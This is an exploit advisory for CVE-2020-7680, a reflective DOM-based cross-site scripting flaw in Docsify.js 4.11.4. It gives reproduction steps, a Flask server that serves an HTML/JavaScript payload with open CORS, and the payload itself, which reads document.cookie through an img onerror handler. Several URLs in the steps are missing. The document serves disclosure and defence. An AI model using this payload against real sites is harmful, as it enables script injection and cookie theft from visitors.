Docsify.js 4.11.4 Cross Site Scripting

Docsify.js version 4.11.4 suffers from a cross site scripting vulnerability.

MD5 | c04ce1f9ca28c7b5d05da5e1c5f7e216

# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Date: 2020-06-22
# Exploit Author: Amin Sharifi
# Vendor Homepage:
# Software Link:
# Version: 4.11.4
# Tested on: Windows 10
# CVE : CVE-2020-7680

docsify.js uses fragment identifiers (parameters after # sign) to load
resources from server-side .md files. it then renders the .md file inside
the HTML page.

For example : sends an ajax to and renders it inside the html page.

due to lack of validation it is possible to provide external URLs after the
/#/ and render arbitrary javascript/HTML inside the page which leads to
DOM-based Cross Site Scripting (XSS).

Steps to reproduce:

step 1. setup a server (for example I use flask here, for the POC im
hosting one on )

step 2. the server should respond to request to / with a crafted
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
also the CORS should be set so that other Origins would be able to send
ajax requests to the server so Access-Control-Allow-Origin must be set to *
(or to the specific domain that you wanna exploit) example code below:

from flask import Flask
import flask

app = Flask(__name__)

def inject():
resp = flask.Response("Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp

step 3. craft the link for execution of the exploit
for example for website you can create the link as
(note that the mentioned domain is no longer vulnerable at the time writing
this report)

when a user visits this URL an ajax request will be sent to and the response of the request will
be rendered inside the webpage which results in XSS payload being executed
on the page.

snyk advisory:
Mitre CVE entry:

Related Posts